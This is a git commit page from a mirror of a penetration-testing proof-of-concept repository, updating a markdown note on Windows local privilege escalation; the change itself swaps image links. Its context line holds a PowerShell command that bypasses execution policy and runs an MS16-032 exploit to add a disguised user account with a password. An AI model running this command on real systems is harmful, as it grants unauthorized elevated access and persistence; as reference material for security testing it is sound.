mirror of
https://github.com/Mr-xn/Penetration_Testing_POC.git
synced 2026-06-01 20:56:58 +08:00
Update Local Privilege Escalation.md
This commit is contained in:
@@ -223,10 +223,10 @@ exp 用途: powershell本地提权
|
|||||||
powershell -nop -exec bypass -c "& {Import-Module 'c:\Invoke-MS16-032.ps1';Invoke-MS16-032 -Application cmd.exe -commandline '/c net user HELPS$ amin!@#45 /add'}"
|
powershell -nop -exec bypass -c "& {Import-Module 'c:\Invoke-MS16-032.ps1';Invoke-MS16-032 -Application cmd.exe -commandline '/c net user HELPS$ amin!@#45 /add'}"
|
||||||
```
|
```
|
||||||
***
|
***
|
||||||

|

|
||||||
|
|
||||||
***
|
***
|
||||||

|

|
||||||
|
|
||||||
***
|
***
|
||||||
|
|
||||||
|
|||||||
Reference in New Issue
Block a user